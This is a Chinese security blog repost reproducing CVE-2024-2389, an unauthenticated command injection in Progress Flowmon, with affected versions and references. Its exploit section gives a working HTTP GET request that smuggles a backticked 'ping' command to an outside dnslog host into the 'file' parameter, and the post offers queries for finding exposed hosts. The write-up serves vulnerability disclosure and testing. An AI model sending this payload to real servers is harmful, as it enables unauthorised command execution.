[漏洞复现] Progress Software Flowmon CVE-2024-2389 命令执行漏洞

admin 2024年4月19日03:15:06评论18 views字数 952阅读3分10秒阅读模式

本人非原创漏洞作者,文章仅作为知识分享用

一切直接或间接由于本文所造成的后果与本人无关

如有侵权,联系删除

产品简介

Progress Software的Flowmon是一种网络监控和安全解决方案,可帮助企业和组织监控、分析和保护其网络。

官网地址:https://www.flowmon.com/

[漏洞复现] Progress Software Flowmon CVE-2024-2389 命令执行漏洞

空间测绘

回复“20240418”获取空间测绘语句

漏洞描述

在 11.1.14 和 12.3.5 之前的 Flowmon 版本中,已发现操作系统命令注入漏洞。未经身份验证的用户可以通过 Flowmon 管理界面进入系统,从而执行任意系统命令。

影响版本

11.xProgress Flowmon < 11.1.1412.xProgress Flowmon < 12.3.511.0之前的所有Flowmon版本(10.x 及更低版本)均不受此漏洞影响

漏洞利用

GET /service.pdfs/confluence?lang=en&file=`ping zg5amk.dnslog.cn` HTTP/1.1Host: xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: */*Accept-Language: enAccept-Encoding: gzip

[漏洞复现] Progress Software Flowmon CVE-2024-2389 命令执行漏洞

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2024-2389https://avd.aliyun.com/detail?id=AVD-2024-2389https://github.com/adhikara13/CVE-2024-2389https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability

回复“20240418”获取空间测绘语句

[漏洞复现] Progress Software Flowmon CVE-2024-2389 命令执行漏洞

原文始发于微信公众号(不够安全):[漏洞复现] Progress Software Flowmon CVE-2024-2389 命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月19日03:15:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞复现] Progress Software Flowmon CVE-2024-2389 命令执行漏洞https://cn-sec.com/archives/2669214.html

发表评论

匿名网友 填写信息